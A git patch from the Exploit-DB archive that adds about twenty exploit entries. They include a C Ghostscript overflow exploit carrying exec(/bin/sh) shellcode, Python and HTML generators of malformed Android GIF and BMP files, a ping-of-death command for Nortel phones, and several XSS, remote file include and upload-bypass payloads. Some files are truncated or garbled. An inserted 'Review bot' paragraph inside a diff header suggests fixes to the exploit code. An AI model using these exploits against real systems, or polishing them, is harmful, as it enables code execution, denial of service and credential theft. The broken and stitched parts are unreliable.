From 890c9015815037ac85bcd3df9e503a77664d760d Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sun, 2 Feb 2014 04:25:24 +0000 Subject: [PATCH] Updated 02_02_2014 --- files.csv | 21 +++++ platforms/asp/webapps/31314.txt | 9 ++ platforms/cgi/webapps/31313.txt | 10 +++ platforms/hardware/dos/31306.txt | 11 +++ platforms/hardware/dos/31307.py | 32 +++++++ platforms/hardware/dos/31308.html | 58 +++++++++++++ platforms/hardware/remote/31311.txt | 32 +++++++ platforms/linux/remote/31309.c | 129 ++++++++++++++++++++++++++++ platforms/php/webapps/31312.txt | 9 ++ platforms/php/webapps/31315.txt | 9 ++ platforms/php/webapps/31316.txt | 9 ++ platforms/php/webapps/31317.txt | 9 ++ platforms/php/webapps/31318.txt | 11 +++ platforms/php/webapps/31319.txt | 9 ++ platforms/php/webapps/31320.txt | 9 ++ platforms/php/webapps/31321.txt | 7 ++ platforms/php/webapps/31322.txt | 9 ++ platforms/php/webapps/31324.txt | 9 ++ platforms/php/webapps/31325.txt | 9 ++ platforms/php/webapps/31326.txt | 9 ++ platforms/php/webapps/31328.txt | 12 +++ platforms/windows/dos/31323.c | 118 +++++++++++++++++++++++++ 22 files changed, 540 insertions(+) create mode 100755 platforms/asp/webapps/31314.txt create mode 100755 platforms/cgi/webapps/31313.txt create mode 100755 platforms/hardware/dos/31306.txt create mode 100755 platforms/hardware/dos/31307.py create mode 100755 platforms/hardware/dos/31308.html create mode 100755 platforms/hardware/remote/31311.txt create mode 100755 platforms/linux/remote/31309.c create mode 100755 platforms/php/webapps/31312.txt create mode 100755 platforms/php/webapps/31315.txt create mode 100755 platforms/php/webapps/31316.txt create mode 100755 platforms/php/webapps/31317.txt create mode 100755 platforms/php/webapps/31318.txt create mode 100755 platforms/php/webapps/31319.txt create mode 100755 platforms/php/webapps/31320.txt create mode 100755 platforms/php/webapps/31321.txt create mode 100755 platforms/php/webapps/31322.txt create mode 100755 platforms/php/webapps/31324.txt create mode 100755 platforms/php/webapps/31325.txt create 
mode 100755 platforms/php/webapps/31326.txt create mode 100755 platforms/php/webapps/31328.txt create mode 100755 platforms/windows/dos/31323.c diff --git a/files.csv b/files.csv index 49f6f0b24..fcf14d17e 100755 --- a/files.csv +++ b/files.csv 
@@ -28114,3 +28114,24 @@ id,file,description,date,author,platform,type,port
 31303,platforms/php/webapps/31303.txt,"Joomla! and Mambo 'com_inter' Component 'id' Parameter SQL Injection Vulnerability",2008-02-25,The-0utl4w,php,webapps,0
 31304,platforms/php/webapps/31304.txt,"Plume CMS 1.2.2 'manager/xmedia.php' Cross-Site Scripting Vulnerability",2008-02-21,"Omer Singer",php,webapps,0
 31305,platforms/linux/dos/31305.c,"Linux 3.4+ recvmmsg x32 compat Proof of Concept",2014-01-31,"Kees Cook",linux,dos,0
+31306,platforms/hardware/dos/31306.txt,"Nortel UNIStim IP Phone Remote Ping Denial of Service Vulnerability",2008-02-26,sipherr,hardware,dos,0
+31307,platforms/hardware/dos/31307.py,"Android Web Browser GIF File Heap-Based Buffer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0
+31308,platforms/hardware/dos/31308.html,"Android Web Browser BMP File Integer Overflow Vulnerability",2008-03-04,"Alfredo Ortega",hardware,dos,0
+31309,platforms/linux/remote/31309.c,"Ghostscript 8.0.1/8.15 zseticcspace() Function Buffer Overflow Vulnerability",2008-02-27,"Will Drewry",linux,remote,0
+31311,platforms/hardware/remote/31311.txt,"Juniper Networks Secure Access 2000 'rdremediate.cgi' Cross Site Scripting Vulnerability",2008-02-28,"Richard Brain",hardware,remote,0
+31312,platforms/php/webapps/31312.txt,"Barryvan Compo Manager 0.3 'main.php' Remote File Include Vulnerability",2008-02-28,MhZ91,php,webapps,0
+31313,platforms/cgi/webapps/31313.txt,"Juniper Networks Secure Access 2000 Web Root Path Disclosure Vulnerability",2008-02-28,"Richard Brain",cgi,webapps,0
+31314,platforms/asp/webapps/31314.txt,"Flicks Software AuthentiX 6.3b1 'username' Parameter Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"William Hicks",asp,webapps,0
+31315,platforms/php/webapps/31315.txt,"XRMS 1.99.2 CRM 'msg' Parameter Cross Site Scripting Vulnerability",2008-02-28,vijayv,php,webapps,0
+31316,platforms/php/webapps/31316.txt,"Centreon 1.4.2 color_picker.php Multiple Cross-Site Scripting Vulnerabilities",2008-02-28,"Julien CAYSSOL",php,webapps,0
+31317,platforms/php/webapps/31317.txt,"netOffice Dwins 1.3 Authentication Bypass Vulnerability and Arbitrary File Upload Vulnerability",2008-02-29,RawSecurity.org,php,webapps,0
+31318,platforms/php/webapps/31318.txt,"Centreon 1.4.2.3 index.php Local File Include Vulnerability",2008-02-29,JosS,php,webapps,0
+31319,platforms/php/webapps/31319.txt,"Simple PHP Scripts gallery 0.x index.php Cross-Site Scripting Vulnerability",2008-02-29,ZoRLu,php,webapps,0
+31320,platforms/php/webapps/31320.txt,"phpMyTourney 2 tourney/index.php Remote File Include Vulnerability",2008-02-29,"HACKERS PAL",php,webapps,0
+31321,platforms/php/webapps/31321.txt,"Heathco Software h2desk Multiple Information Disclosure Vulnerabilities",2008-03-01,joseph.giron13,php,webapps,0
+31322,platforms/php/webapps/31322.txt,"PHP-Nuke Johannes Hass 'gaestebuch 2.2 Module 'id' Parameter SQL Injection Vulnerability",2008-03-01,TurkishWarriorr,php,webapps,0
+31323,platforms/windows/dos/31323.c,"ADI Convergence Galaxy FTP Server Password Remote Denial of Service Vulnerability",2008-03-01,"Maks M",windows,dos,0
+31324,platforms/php/webapps/31324.txt,"KC Wiki 1.0 minimal/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
+31325,platforms/php/webapps/31325.txt,"KC Wiki 1.0 simplest/wiki.php page Parameter Remote File Inclusion",2008-03-03,muuratsalo,php,webapps,0
+31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 Information Disclosure, HTML Injection, and Cross-Site Scripting Vulnerabilities",2008-03-03,"Digital Security Research Group",php,webapps,0
+31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
diff --git a/platforms/asp/webapps/31314.txt b/platforms/asp/webapps/31314.txt
new file mode 100755
index 000000000..cba398a94
--- /dev/null
+++ b/platforms/asp/webapps/31314.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28040/info
+
+Flicks Software AuthentiX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+AuthentiX 6.3b1 Trial Version is vulnerable; other versions may also be affected.
+
+https://www.example.com/aspAdmin/editUser.asp?username=%3CMETA%20HTTP-EQUIV=%22refresh%22%20CONTENT=%220;%20URL=http://www.example2.com/%22%3E
\ No newline at end of file
diff --git a/platforms/cgi/webapps/31313.txt b/platforms/cgi/webapps/31313.txt
new file mode 100755
index 000000000..901ea9292
--- /dev/null
+++ b/platforms/cgi/webapps/31313.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28037/info
+
+Juniper Networks Secure Access 2000 is prone to a path-disclosure vulnerability.
+
+Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks.
+
+Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected.
+
+https://www.example.com/dana-na/auth/remediate.cgi?action=&step=preauth
+https://www.example.com/dana-na/auth/remediate.cgi?step=preauth
\ No newline at end of file
diff --git a/platforms/hardware/dos/31306.txt b/platforms/hardware/dos/31306.txt
new file mode 100755
index 000000000..286097187
--- /dev/null
+++ b/platforms/hardware/dos/31306.txt
@@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/28004/info + +Nortel UNIStim IP Phone products are prone to a remote denial-of-service vulnerability because the software fails to properly handle unexpected network datagrams. + +Successfully exploiting this issue allows remote attackers to crash affected phones, denying service to legitimate users. + +Phones with firmware 0604DAS are vulnerable to this issue. Other versions are also reportedly affected, but we don't know which specific versions. + +The following command will demonstrate this issue: + +ping -s 65500 \ No newline at end of file diff --git a/platforms/hardware/dos/31307.py b/platforms/hardware/dos/31307.py new file mode 100755 index 000000000..0bd832ca6 --- /dev/null +++ b/platforms/hardware/dos/31307.py @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/28005/info + +Android Web Browser is prone to a heap-based buffer-overflow vulnerability because it fails to adequately bounds-check user-supplied data before copying it to an insufficiently sized memory buffer. + +Successfully exploiting this vulnerability can allow remote attackers to execute arbitrary machine code in the context of the application. Failed attempts will likely result in denial-of-service conditions. + +This issue affects Android SDK m3-rc37a and earlier. + +##Android Heap Overflow +##Ortega Alfredo _ Core Security Exploit Writers Team +##tested against Android SDK m3-rc37a + +import Image +import struct + +#Creates a _good_ gif image +imagename='overflow.gif' +str = '\x00\x00\x00\x00'*30000 +im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1) +im.save(imagename,'GIF') + +#Shrink the Logical screen dimension +SWidth=1 +SHeight=1 + +img = open(imagename,'rb').read() +img = img[:6]+struct.pack(' +# Alfredo Ortega - Core Security +import struct + +offset = 0xffef0000 +width = 0x0bffff +height=8 + +bmp ="\x42\x4d\xff\x00\x00\x00\x00\x00\x00\x00" +bmp+=struct.pack(" + + + + + + + \ No newline at end of file 
diff --git a/platforms/hardware/remote/31311.txt b/platforms/hardware/remote/31311.txt new file mode 100755 index 000000000..27745c34f --- /dev/null +++ b/platforms/hardware/remote/31311.txt @@ -0,0 +1,32 @@ +source: http://www.securityfocus.com/bid/28034/info + +Juniper Networks Secure Access 2000 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Juniper Networks Secure Access 2000 5.5R1 Build 11711 is vulnerable; other versions may also be affected. + +https://www.example.com/dana-na/auth/rdremediate.cgi?delivery_mode=&action=tryagain&signinId=url_default + +COMPLETE HTTP REQUEST: + +GET +/dana-na/auth/rdremediate.cgi?delivery_mode=&action=tryagain&signinId=url_default +HTTP/1.1 +User-Agent: curl/7.15.4 (i486-pc-linux-gnu) libcurl/7.15.4 +OpenSSL/0.9.8b zlib/1.2.3 libidn/0.6.3 +Host: target-domain.foo +Accept: */* +[CRLF] +[CRLF] + + +PARTIAL HTTP RESPONSE: + + + +[SNIP] + + Unknown deliver mode + + diff --git a/platforms/linux/remote/31309.c b/platforms/linux/remote/31309.c new file mode 100755 index 000000000..2f2f4f180 --- /dev/null +++ b/platforms/linux/remote/31309.c 
@@ -0,0 +1,129 @@
+source: http://www.securityfocus.com/bid/28017/info
+
+Ghostscript is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
+
+Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the application. Failed exploit attempts will cause denial-of-service conditions.
+
+/* A proof of concept exploit for ghostscript 8.61 and earlier.
+ *
+ * Vulnerability discovered by Chris Evans
+ * Author: wad@google.com (Will Drewry)
+ *
+ * Affects: All versions of ghostscript that support .seticcspace.
+ * Tested on: Ubuntu gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 (x86)
+ * Ghostscript 8.61 (2007-11-21) (x86)
+ *
+ * Discussion:
+ *
+ * The vulnerability is in the float vector handling in the seticcspace
+ * function. zicc.c:seticcspace() allows the user to set the number of
+ * expected float values (ncomps) in a vector (range_buff). However,
+ * this vector is statically allocated with the maximum space of 8
+ * floats. Despite this, the call (dict_floats_array_check_param) to
+ * populate the array of floats is passed a maximum size of ncomps*2. A
+ * large payload will result in overflowing this array. Since all the
+ * values are read in as single precision floating point values, the
+ * payload must be encoded as floats.
+ *
+ * This exploit encodes a basic metasploit-generated exec(/bin/sh) chunk
+ * of shellcode as a list of floats and prepends the address to a "jmp
+ * *%esp" in the /usr/bin/gs.
+ *
+ * This was tested on gs-esp-8.15.2.dfsg.0ubuntu1-0ubuntu1 package in
+ * Ubuntu (on a 32-bit-only kernel) and versions up to 8.61
+ * (2007-11-21) on other distributions.
+ */
+
+#include
+#include
+#include
+#include
+
+unsigned char shellcode[] =
+"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68\x00"
+"\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x08\x00\x00\x00\x2f\x62\x69"
+"\x6e\x2f\x73\x68\x00\x57\x53\x89\xe1\xcd\x80";
+unsigned char sledpad[] = "\x90\x90\x90"; // maximum sledpad needed
+unsigned char spacepad[] = "\x41\x41\x41\x41"; // indicator for fun dumps
+
+float bytes_to_float(unsigned char *bytes) {
+ float f = 0.0f;
+ memcpy((void *)&f, bytes, sizeof(float));
+ return f;
+}
+
+unsigned char *build_attack(size_t *attack_size, long a, int padding) {
+ size_t float_size = sizeof(float);
+ size_t shellcode_size = sizeof(shellcode) - 1;
+ size_t sledpad_size = float_size - (shellcode_size % float_size);
+ size_t pad_size = padding * (sizeof(spacepad) - 1);
+ unsigned char *attack = NULL, *padded_shellcode = shellcode;
+ int i,j;
+
+ // allocate attack space
+ *attack_size = shellcode_size + sledpad_size + sizeof(a) + pad_size;
+ if (*attack_size) attack = malloc(*attack_size);
+ if (attack == NULL) exit(1);
+
+ fprintf(stderr, "sizeof(float) = %d\n", float_size);
+ fprintf(stderr, "sledpad_size = %d\n", sledpad_size);
+ fprintf(stderr, "pad_size = %d\n", pad_size);
+ fprintf(stderr, "attack_size = %d\n", *attack_size);
+ fprintf(stderr, "address = %p\n", a);
+
+ // write out request space padding
+ for (i = 0; i < pad_size; i += sizeof(spacepad)-1)
+ memcpy(&attack[i], spacepad, sizeof(spacepad)-1);
+
+ // write out the address to a "jmp *%esp"
+ memcpy(&attack[i], (void *)&a, sizeof(long));
+ i += sizeof(long);
+
+ // pad to ensure that shellcode is divisible by sizeof(float)
+ if (sledpad_size != float_size){
+ // build a padded a shellcode
+ padded_shellcode = malloc(shellcode_size+sledpad_size);
+ if (padded_shellcode == NULL) exit(1);
+ memcpy(padded_shellcode, sledpad, sledpad_size);
+ memcpy(padded_shellcode+sledpad_size, shellcode, shellcode_size);
+ shellcode_size += sledpad_size;
+ }
+
+ // Copy in the padded shellcode
+ memcpy(&attack[i], padded_shellcode, shellcode_size);
+
+ if (shellcode != padded_shellcode) free(padded_shellcode);
+ // That's it.
+ return attack;
+}
+
+int main(int argc, char **argv) {
+ size_t i = 0;
+ size_t attack_size = 0;
+ unsigned char *attack = NULL;
+ // location of jmp *esp in the binary
+ long address = 0x0;
+
+
+ if (argc != 3){
+ fprintf(stderr, "Usage: %s \n", argv[0]);
+ fprintf(stderr, " e.g. %s 15 $((0x8744eff))\n", argv[0]);
+ fprintf(stderr, "An address can be acquired with:\n");
+ fprintf(stderr, " objdump -D /usr/bin/gs | grep 'jmp[ \\t]\\+\\*%%esp'\n");
+ return 1;
+ }
+
+ attack = build_attack(&attack_size, atol(argv[2]), atoi(argv[1]));
+
+ // output the bad PS
+ printf(
+ "%!PS-Adobe-2.0\n\n"
+ "<< /DataSource currentfile /N 100 /Range [ ");
+ // convert the attack to floats
+ for(i = 0; i <= attack_size - sizeof(float); i += sizeof(float))
+ printf("%.9g ", bytes_to_float(attack+i));
+ printf(" ] >> .seticcspace\n");
+
+ free(attack);
+ return 0;
+}
diff --git a/platforms/php/webapps/31312.txt b/platforms/php/webapps/31312.txt
new file mode 100755
index 000000000..d7f859355
--- /dev/null
+++ b/platforms/php/webapps/31312.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28035/info
+
+Barryvan Compo Manager is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+This issue affects Barryvan Compo Manager 0.3; other versions may also be vulnerable.
+
+http://www.example.com/main.php?pageURL=[Evil_Code]
\ No newline at end of file
diff --git a/platforms/php/webapps/31315.txt b/platforms/php/webapps/31315.txt
new file mode 100755
index 000000000..85b2cd3d7
--- /dev/null
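Review bot: The diagnostic fprintf calls in build_attack pass size_t values to `%d` and a long to `%p`, which is undefined behaviour and misprints on LP64 builds; the portable form is `%zu` for the four size arguments and `%lx` (or `(void *)a` with `%p`) for the address. The declaration `int i,j;` leaves j unused and makes i a signed index that is compared against the size_t pad_size, so a -Wall -Wextra build flags both; `size_t i;` is sufficient. The header comment documents the root cause clearly (range_buff fixed at 8 floats while the bound passed to dict_floats_array_check_param is ncomps*2), and for a defensive reading that is the property worth noting: a fix or a detection rule keys on the number of /Range values reaching .seticcspace exceeding the buffer, not on anything specific to this payload.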
+++ b/platforms/php/webapps/31315.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28041/info
+
+XRMS CRM is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+XRMS CRM 1.99.2 is affected; other versions may also be vulnerable.
+
+http://www.example.com//xrms/admin/users/self.php?msg=Preferences%20successfully%20saved&msg=
\ No newline at end of file
diff --git a/platforms/php/webapps/31316.txt b/platforms/php/webapps/31316.txt
new file mode 100755
index 000000000..0ca0b1198
--- /dev/null
+++ b/platforms/php/webapps/31316.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28043/info
+
+Centreon is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Centreon 1.4.2.2 and 1.4.2.3 are vulnerable; other versions may also be affected.
+
+http://www.example.com//include/common/javascript/color_picker.php?&name=XSS&title=%3Cscript%3Ea=/Test%20XSS/;alert(a.source)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/31317.txt b/platforms/php/webapps/31317.txt
new file mode 100755
index 000000000..65d78ee90
--- /dev/null
+++ b/platforms/php/webapps/31317.txt
@@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/28051/info + +netOffice Dwins is prone to a vulnerability that allows attackers to bypass authentication as well as a vulnerability that allows attackers to upload arbitrary files. These issues occur because the application fails to adequately sanitize user-supplied input. + +Attackers can leverage these issues to gain unauthorized access to the application and to execute arbitrary code in the context of the application. + +These issues affect Dwins 1.3 p2; other versions may also be affected. + +
Upload Form
Comments :